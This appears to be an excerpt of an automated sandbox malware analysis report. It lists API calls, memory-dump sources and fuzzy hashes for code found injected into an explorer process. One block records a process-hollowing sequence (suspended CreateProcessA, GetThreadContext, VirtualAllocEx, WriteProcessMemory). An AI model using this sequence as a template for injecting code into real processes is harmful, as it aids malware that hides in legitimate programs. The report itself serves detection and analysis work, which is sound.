                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,02F169C2,00000001,00000364,00000006,000000FF,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84), ref: 02F1A25B
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                        • Opcode ID: 8004cc1359b03e840734dba0efcf552bc7e5220a608742021419b6e742f6b495
                                                                                                                                                                                                                        • Instruction ID: 3216b3a491c573c1acb9e6a595687818f59af31f6c38933a9a3db9f603aa46d1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8004cc1359b03e840734dba0efcf552bc7e5220a608742021419b6e742f6b495
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6EF0E932A4756467DB295A21AC04B6A7789AF837F0FA44121BE4896180DF72D900CBE0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,02F008E7,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84,76F90F00), ref: 02F17E67
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                        • Opcode ID: 10b3408fac8d2f52ca099c5513972a257c82165e596b2f8ea3ce4593385b0e85
                                                                                                                                                                                                                        • Instruction ID: d9422c57ac026d5a1cff51b57cb388d77efbc7b81c1382e70d11b8141749032b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10b3408fac8d2f52ca099c5513972a257c82165e596b2f8ea3ce4593385b0e85
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8CE0E532A0011467E6203A72DC00B5BFACA9B817F0F840122EE099E080CF61CD408BE4
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 02F00925
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4119054056-0
                                                                                                                                                                                                                        • Opcode ID: d8bc43537ea591d2a103fd246b31747932d8aa1d34e1db48e5f3f18fd8f510b9
                                                                                                                                                                                                                        • Instruction ID: a6e351e37f19e840befae6af242edcf9664948ca35d751b8f7a50ecb0a411e73
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8bc43537ea591d2a103fd246b31747932d8aa1d34e1db48e5f3f18fd8f510b9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52F0F471E40244ABCB01BB6CCD12B0DBBBAEB12BA0F84035DE922672D1DAB159144BD2
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 02F00A45
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4119054056-0
                                                                                                                                                                                                                        • Opcode ID: d4401088b108ebeaee4a1cf9009c3ace6e7ca10217412b4374df03c737b2bf0d
                                                                                                                                                                                                                        • Instruction ID: bf6b176095f6e40f2df7bd12336e7c8bf7c6e9746d37d823457323c8ecec343f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4401088b108ebeaee4a1cf9009c3ace6e7ca10217412b4374df03c737b2bf0d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EF0F971E40644A7DB017B6CCD12B0DBBB9EB22BA0F80035CE912272D1DB7159144BD2
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6
                                                                                                                                                                                                                        • Sleep.KERNELBASE ref: 02F009B5
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4119054056-0
                                                                                                                                                                                                                        • Opcode ID: 8315e5d16d0ba40dd3ccd7896b4b966131c1843e9f25ab0febd745bdbf857a1d
                                                                                                                                                                                                                        • Instruction ID: 84cdbf6c4ecd9331ed1a9672bf352e0e1472eef329f1309465652c4ed18facf2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8315e5d16d0ba40dd3ccd7896b4b966131c1843e9f25ab0febd745bdbf857a1d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61F0F971E40644ABD7017B6CCD12B0DBBA9EB12BA0F84035CE912673D1DA7159144BD2
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 02F090E3
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02F090F1
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02F09102
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02F09113
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02F09124
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02F09135
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 02F09146
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02F09157
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 02F09168
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02F09179
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02F0918A
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02F0919B
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02F091AC
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02F091BD
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02F091CE
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02F091DF
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02F091F0
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 02F09201
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 02F09212
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 02F09223
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 02F09234
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 02F09245
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 02F09256
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 02F09267
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 02F09278
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 02F09289
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 02F0929A
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 02F092AB
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 02F092BC
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 02F092CD
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 02F092DE
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 02F092EF
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 02F09300
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 02F09311
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 02F09322
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 02F09333
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 02F09344
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 02F09355
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 02F09366
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 02F09377
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 02F09388
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                        • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                                                                                                                        • API String ID: 667068680-295688737
                                                                                                                                                                                                                        • Opcode ID: 34005fcae3b879af743d0a14f598d3b06babd69057bdd394d2ea4251f60b1b15
                                                                                                                                                                                                                        • Instruction ID: 49243c1102d4d30cafa994b03ce230bace9431aebe212df2b3f987e2862f0f25
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34005fcae3b879af743d0a14f598d3b06babd69057bdd394d2ea4251f60b1b15
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86611BB6DD1318ABEB016FB5AA0DD46FBE9BA1ABC13044D1BB306D6601DBF484218F54
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: ($($($($($($($*$*$8$8$>$>$\&$`$g$g$z
                                                                                                                                                                                                                        • API String ID: 0-3202205502
                                                                                                                                                                                                                        • Opcode ID: caf5b17593d9491f9d731897474dabe55c1700c579e61b0b8f45ecac076660b4
                                                                                                                                                                                                                        • Instruction ID: 2f070534edbe53a8d8c070330a919bad6f5bed8db96cf02cb815e114730be41f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: caf5b17593d9491f9d731897474dabe55c1700c579e61b0b8f45ecac076660b4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6274BCB5A083918FD364CF29C584A5AFBE2FBC9344F10892EEA99D7350D770A845CF52
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02EE809D
                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02EE80FB
                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02EE8114
                                                                                                                                                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 02EE8129
                                                                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 02EE8149
                                                                                                                                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 02EE818B
                                                                                                                                                                                                                        • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 02EE81A8
                                                                                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02EE8261
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                                                                                                                                                                                                                        • String ID: $VUUU$invalid stoi argument
                                                                                                                                                                                                                        • API String ID: 3796053839-3954507777
                                                                                                                                                                                                                        • Opcode ID: 06e5d4e209caebb9b9f265a32ffb8971738e50e436ce72097c25e54563e6c0d4
                                                                                                                                                                                                                        • Instruction ID: fcee502fb76fa629f376ac79e7e5b1bbb27b2d3b97719cd0d5bf822ad7021bfd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06e5d4e209caebb9b9f265a32ffb8971738e50e436ce72097c25e54563e6c0d4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB4150B1684705BFE7209F50DC05F56BBE9BF88B44F40481AF789E6190EBB0A914CB96
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
                                                                                                                                                                                                                          • Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3
                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,02F14C29,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 02F21C89
                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02F14C29,?,?,?,00000055,?,-00000050,?,?), ref: 02F21CB4
                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 02F21D48
                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 02F21D56
                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 02F21E17
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                                                                        • API String ID: 4147378913-905460609
                                                                                                                                                                                                                        • Opcode ID: 266755596ba82e2bc3186b615a22dc8b7bcdc5855fc4cb01d2048768d888ca88
                                                                                                                                                                                                                        • Instruction ID: d96d6e311967a516f3df9162a9c1900d9ce8d22174891450da3ac7a819cc0bfc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 266755596ba82e2bc3186b615a22dc8b7bcdc5855fc4cb01d2048768d888ca88
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4711C36E40226AAE725EB34CC41BBB73A9EF467C0F504469E70ADB182EB70D549CB54
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,02F22672,00000002,00000000,?,?,?,02F22672,?,00000000), ref: 02F223ED
                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,02F22672,00000002,00000000,?,?,?,02F22672,?,00000000), ref: 02F22416
                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,02F22672,?,00000000), ref: 02F2242B
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                        • Opcode ID: d6b741fa6070af93db9628dde2e089cb6c93f14c3969f6f58296b012203fd2f7
                                                                                                                                                                                                                        • Instruction ID: 8067ee21aa4ce9f40101705c81f68e4b17a91af7a1636a6d5d7f4863415bcccd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6b741fa6070af93db9628dde2e089cb6c93f14c3969f6f58296b012203fd2f7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F221C822F00125A6DB348F55CB44B9B73A7EF46AD4B968424EF09DB115EB32DE49C350
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
                                                                                                                                                                                                                          • Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3
                                                                                                                                                                                                                          • Part of subcall function 02F16820: _free.LIBCMT ref: 02F16882
                                                                                                                                                                                                                          • Part of subcall function 02F16820: _free.LIBCMT ref: 02F168B8
                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 02F22635
                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 02F2267E
                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 02F2268D
